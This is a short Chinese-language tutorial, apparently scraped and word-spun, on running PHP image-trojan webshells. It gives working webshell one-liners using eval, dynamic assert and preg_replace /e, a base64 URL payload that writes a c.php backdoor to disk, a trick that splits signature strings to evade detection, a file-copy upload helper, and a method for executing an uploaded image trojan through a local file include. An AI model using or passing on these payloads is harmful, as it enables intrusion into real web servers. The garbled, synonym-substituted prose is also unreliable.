PHP图片木马的的运转要领
1、规范的写法,直接经由过程eval实行php代码
@eval ($_POST['code']);
2、动态实行assert生成一个木马文件(隐蔽性最好的一种)
@$_GET['a']($_GET['code']);
3、运用要领:从url中传入下面参数实行后会在当前目次生成一个c.php的文件
/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29, base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
a参数为eval时会报错(由于eval不是函数)木马生成失利,为assert时一样报错,但会生成木马。
4、运用preg_replace实行代码(内里前面只要用一个的恣意字符串就能够,假如不一样的话敕令可能会被实行屡次)
@preg_replace("/re/e", $_POST['code'], "re");
5、把特性码打散
session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
6、重命名恣意文件
$reg="c"."o"."p"."y"; $reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);
include的破绽运用要领
有时刻我们会上传一些图片木马然则却不能实行,这个时刻假如有一个include的破绽,那末图片木马就能够实行啦。
假如php代码里有一个include($_GET['controller']) 且另有一个url途径为:/index.php?controller=user,这个看起来就是一个依据参数包括实行对应控制器的代码,然则假如url途径里的参数改成如许:/index.php?uid=/upload/images/muma.jpg,这个时刻木马就实行啦。
以上内容仅供参考!
引荐教程:PHP视频教程
以上就是php图片木马怎样运转的细致内容,更多请关注ki4网别的相干文章!